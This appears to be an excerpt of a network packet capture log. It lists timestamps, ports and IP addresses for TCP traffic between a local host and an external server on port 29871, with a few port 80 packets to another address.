Apr 19, 2024 19:21:33.081382036 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.081413031 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.081449986 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.081458092 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.081489086 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.081492901 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.081530094 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.081568003 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.081569910 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.081608057 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.081645966 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.081650972 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.081684113 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.081722021 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.081759930 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.081765890 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.081799984 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.081840038 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.081845999 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.081877947 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.081883907 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.081917048 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.081955910 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.081962109 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.081994057 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.082034111 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.082040071 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.082071066 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.082108974 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.082146883 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.082153082 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.082185030 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.082223892 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.082227945 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.082262993 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.082266092 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.082300901 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.082340002 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.082346916 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.082380056 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.082417965 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.082426071 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.082457066 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.082931995 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.082971096 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.082978964 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.083394051 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.282665968 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.282733917 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.282774925 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.282814026 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.282855988 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.282897949 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.282917023 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.282917023 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.282938004 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.282954931 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.282980919 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.283019066 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.283057928 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.283098936 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.283137083 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.283174992 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.283173084 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.283173084 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.283212900 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.283215046 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.283252001 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.283258915 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.283293009 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.283330917 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.283335924 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.283384085 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.283423901 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.283433914 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.283464909 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.283503056 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.283543110 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.283544064 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.283582926 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.283621073 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.283627033 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.283660889 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.283663988 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.283701897 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.283741951 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.283747911 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.283780098 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.283821106 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.283828020 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.283859015 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.283899069 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.283940077 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.283945084 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.283979893 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.284013987 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.284024000 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.284030914 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.284049988 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.284064054 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.284068108 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.284086943 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.284086943 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.284120083 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.284133911 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.284138918 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.284156084 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.284173965 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.284178972 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.284190893 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.284209013 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.284218073 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.284228086 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.284245968 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.284255981 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.284264088 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.284281969 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.284282923 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.284301043 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.284318924 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.284338951 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.284338951 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.284357071 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.284360886 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.284374952 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.284394026 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.284394026 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.284411907 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.284431934 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.284449100 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.284454107 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.284466982 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.284475088 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.284486055 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.284504890 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.284522057 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.284526110 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.284540892 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.284544945 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.284559011 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.284578085 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.284595966 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.284598112 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.284615040 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.284621954 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.284634113 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.284651995 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.284677029 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.284682989 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.284703016 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.284723997 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.284727097 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.284735918 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.284743071 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.284761906 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.284780025 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.284781933 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.284799099 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.284818888 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.284837008 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.284838915 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.284854889 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.284857035 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.284873962 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.284892082 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.284910917 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.284913063 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.284929037 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.284934044 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.284946918 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.284965038 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.284984112 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.284986973 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.285001993 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.285013914 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.285018921 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.285037041 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.285053968 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.285056114 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.285073996 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.285077095 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.285092115 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.285109997 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.285128117 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.285130024 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.285149097 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.285151958 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.285167933 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.285185099 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.285202026 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.285206079 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.285219908 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.285228014 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.285238981 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.285258055 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.285275936 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.285279036 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.285295010 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.285296917 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.285314083 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.285332918 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.285351992 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.285353899 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.285371065 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.285377979 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.285388947 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.285409927 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.285428047 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.285430908 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.285446882 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.285454988 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.285465002 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.285482883 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.285502911 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.285505056 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.285520077 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.285533905 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.285538912 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.285557985 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.285564899 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.285574913 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.285593987 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.285604954 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.285612106 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.285629988 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.285636902 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.285648108 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.285665989 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.285684109 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.285686970 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.285701990 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.285708904 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.285722017 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.285739899 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.285758972 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.285761118 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.285778046 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.285783052 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.287601948 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.391459942 CEST | 80 | 49720 | 178.237.33.50 | 192.168.2.5 |
Apr 19, 2024 19:21:33.391549110 CEST | 49720 | 80 | 192.168.2.5 | 178.237.33.50 |
Apr 19, 2024 19:21:33.486620903 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.486655951 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.486675024 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.486695051 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.486709118 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.486718893 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.486737013 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.486752987 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.486754894 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.486776114 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.486778975 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.486794949 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.486814976 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.486824989 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.486834049 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.486851931 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.486865997 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.486874104 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.486891985 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.486892939 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.486911058 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.486934900 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.486953020 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.486953974 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.486972094 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.486974955 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.486990929 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.487009048 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.487026930 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.487031937 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.487046957 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
